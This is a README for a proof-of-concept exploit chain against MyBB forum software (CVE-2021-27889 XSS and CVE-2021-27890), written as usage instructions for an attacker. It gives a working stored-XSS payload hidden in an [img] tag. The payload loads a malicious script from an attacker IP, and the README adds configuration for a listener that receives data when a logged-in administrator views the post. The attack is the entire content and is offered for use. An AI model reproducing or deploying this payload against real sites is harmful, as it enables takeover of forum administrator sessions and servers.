Mybb-XSS_SQL_RCE-POC(CVE-2021-27890 & CVE-2021-27889).md
2.18 KB / 2021-04-21 09:23:46
# Mybb-XSS_SQL_RCE-POC(CVE-2021-27890 & CVE-2021-27889)
Mybb associate CVE-2021-27890 & CVE-2021-27889 to RCE poc
</br>
**Before Use:**
There are two files here: 1.js and attack_listen.py
You should modify these two file:
**1.js:**
源码[1.js](resource/Mybb-XSS_SQL_RCE-POC(CVE-2021-27890&CVE-2021-27889)/media/1.js)
modify the mybb forum url and attack url:
```js
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py
```
</br>
**attack_listen.py**
源码[attack_listen.py](resource/Mybb-XSS_SQL_RCE-POC(CVE-2021-27890&CVE-2021-27889)/media/attack_listen.py)
modify the attack host and attack port:
```python
attack_host = '192.168.92.165'
attack_port = 8080
```
</br>
**Usage:**
CVE-2021-27889 is xss. You should inject the following payload in "**New Post Thread**" or "**Reply**" or "**Private Messages**" before do the attack.In this demo,I send the payload to "New Post Thread"
*notice that the **192.168.92.165** is the evil server ip,You should change it.*
```html
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]
```
/media/1.png)
</br>
Now Our evil js **1.js** is injected successful.Then we should wait an Admin browsed this Post with loggined admin page cookie.
*Notice that the Admin user have no necessary loggin the forum page.*
</br>
In our waiting time,We should run the "attack_listen.py" in our attack machine, To identify if the Admin user be attacked.
```shell
python3 attack_listen.py
```
</br>
When the Admin user browsed the evil post,the evil js will do the attack:
/media/2.png)
</br>
We can receive the information at our attack machine:
/media/3.png)
/media/4.png)